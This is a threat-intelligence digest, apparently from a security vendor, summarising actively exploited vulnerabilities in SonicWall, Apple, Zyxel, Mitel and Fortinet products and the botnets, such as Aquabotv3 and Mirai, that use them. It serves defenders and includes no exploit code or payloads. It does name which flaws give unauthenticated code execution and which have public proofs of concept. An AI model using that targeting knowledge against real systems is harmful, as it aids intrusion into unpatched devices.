This week, CISA expanded its Known Exploited Vulnerabilities (KEV) catalog with two critical additions, one affecting SonicWall and another targeting Apple, both of which were actively exploited as zero-days. Meanwhile, GreyNoise flagged active exploitation attempts in Zyxel CPE devices and multiple Fortinet products, signaling ongoing threats in enterprise security.

The botnet ecosystem remains relentless, with EnemyBot and Sysrv-K exploiting vulnerabilities in Spring Cloud Gateway, while Mozi, Andr0xgh0st, Tsunami, Spytech Necro, and Sysrv targeted Atlassian products.  

In a concerning development, the Mirai-based Aquabot botnet has evolved into a new variant, Aquabotv3, which is actively targeting Mitel SIP phones and exploiting known vulnerabilities across various devices.   Researchers have also identified that the Mirai botnet is exploiting an unpatched flaw in Zyxel CPE devices, enabling it to launch large-scale IoT-driven DDoS attacks.

With escalating exploitation trends and botnets adapting rapidly, organizations must stay vigilant, prioritize patching, and bolster their defenses against these evolving threats.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-23006

A Deserialization of Untrusted Data Vulnerability has been identified in SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC), affecting versions 12.4.3-02804 and earlier. Discovered and reported by the Microsoft Threat Intelligence Center (MSTIC) as a zero-day, this flaw allows unauthenticated attackers to execute arbitrary code on vulnerable devices, posing a severe security risk. With a CVSS score of 9.8, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, emphasizing the urgent need for mitigation.

CVE-2025-24085

A Use-After-Free Vulnerability in Apple's Core Media Component could enable a malicious application already installed on the device, to escalate its privileges. Apple has released a security update to address this vulnerability which was actively exploited as a zero-day. In response, CISA has added this vulnerability to its KEV catalog, urging users to apply the patch promptly to mitigate potential risks.

‍CVE-2024-40891  

A Command Injection Vulnerability in Zyxel CPE devices allows attackers to execute arbitrary commands, potentially leading to full system compromise, data exfiltration, or network infiltration. Despite being first reported by VulnCheck in 2024, this flaw remains unpatched and unacknowledged by the vendor, increasing the risk of exploitation. Recently, GreyNoise has observed active attacks targeting this vulnerability, highlighting the urgency for organizations to implement mitigations, such as restricting access to administrative interfaces and monitoring for suspicious activity.  

‍CVE-2024-41710

A Command Injection Vulnerability affecting Mitel 6800, 6900 and 6900w series SIP phones, including the 6970 Conference Unit, could enable attackers to execute arbitrary commands within the phone's environment. In August 2024, Kyle Burns of PacketLabs released a proof-of-concept (PoC) exploit code demonstrating that the flaw stemmed from improper sanitization of user-supplied input. According to a recent report from Akamai, the first known exploitation attempts targeting this vulnerability emerged in January 2025, roughly six months after its initial disclosure. The vulnerability is now under active exploitation, with attacks leveraging it to gain control over vulnerable devices.  

‍CVE-2022-40684

An Authentication Bypass Vulnerability in the Fortinet FortiOS, FortiProxy and FortiSwitchManager enables unauthenticated attackers to execute administrative operations via specially crafted HTTP or HTTPS requests. Despite Fortinet releasing patches in October 2022, thousands of devices remained unpatched. GreyNoise has identified over 15,000 exposed Fortinet FortiGate firewalls, with attackers actively exploiting the flaw for malicious purposes.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2024-40891

According to GreyNoise Security, researchers have found a striking overlap between IPs leveraging CVE-2024-40891 and those previously associated with Mirai botnet operations. This indicates that certain strains of Mirai have adopted the exploit, significantly increasing their potential for massive IoT-driven DDoS campaigns.

‍Aquabotv3: The Evolving Threat Targeting Mitel SIP Phones

The Akamai Security Intelligence and Response Team (SIRT) has uncovered a new variant of the Mirai-based malware, Aquabot, which is actively exploiting Mitel SIP phones. This latest evolution, identified as Aquabotv3, marks the third distinct iteration of this botnet malware. The botnet primarily targets CVE-2024-41710, a command injection vulnerability affecting Mitel devices. However, its exploitation efforts extend beyond this flaw, also leveraging vulnerabilities such as CVE-2023-26801, CVE-2022-31137, CVE-2018-10561, CVE-2018-10562, CVE-2018-17532 and a remote code execution vulnerability in Linksys E-series devices.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/01/29/cisa-adds-one-known-exploited-vulnerability-catalog  
2. ‍https://www.cisa.gov/news-events/alerts/2025/01/24/cisa-adds-one-known-exploited-vulnerability-catalog
3. ‍https://www.akamai.com/blog/security-research/2025-january-new-aquabot-mirai-variant-exploiting-mitel-phones
4. ‍https://www.greynoise.io/blog/hackers-actively-exploiting-fortinet-firewalls-real-time-insights-from-greynoise
5. ‍https://vulncheck.com/blog/initial-access-intelligence-july-2024
6. ‍https://www.theregister.com/2025/01/28/apple_cve_2025_24085/
7. ‍https://www.greynoise.io/blog/active-exploitation-of-zero-day-zyxel-cpe-vulnerability-cve-2024-40891